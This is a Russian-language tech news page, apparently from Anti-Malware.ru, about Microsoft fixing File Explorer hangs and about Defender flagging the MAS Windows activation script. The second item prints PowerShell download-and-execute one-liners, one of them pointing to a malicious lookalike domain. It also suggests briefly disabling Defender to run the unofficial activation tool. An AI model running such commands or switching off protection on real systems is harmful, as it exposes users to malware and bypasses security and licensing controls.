Microsoft починила зависания Проводника в Windows 11 и Windows Server

Microsoft починила зависания Проводника в Windows 11 и Windows Server

Microsoft починила зависания Проводника в Windows 11 и Windows Server

Microsoft устранила неприятный баг, из-за которого Проводник (File Explorer) в системах Windows 11 и Windows Server отказывался нормально работать при попытке просмотреть действующие разрешения на доступ к какому-либо файлу или директории.

Для воспроизведения бага достаточно было открыть параметры доступа в свойствах любого файла или папки (на вкладке «Дополнительно»). Далее ОС выдавала сообщение, что операция выполняется, но ничего не происходило.

Кроме того, после описанных действий процесс explorer.exe начинал потреблять немало ресурсов процессора. Даже после закрытия проблемного окна нагрузка на CPU сохранялась, что приводило к зависаниям в работе Проводника.

Как известно, с багом могли столкнуться пользователи последних сборок: Windows 11 21H2/22H2 и Windows Server 2022. По словам Microsoft, зависания начали проявляться после установки обновления от 9 мая 2023 года.

Для компьютеров на Windows 11 22H2, разработчики выпустили накопительное обновление под номером KB5027303. В обязательном порядке этот апдейт придёт всем с выходом июльского набора патчей.

«Это обновление устраняет проблемы с Проводником Windows, из-за которых программа переставала отвечать», — объясняют в Microsoft.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru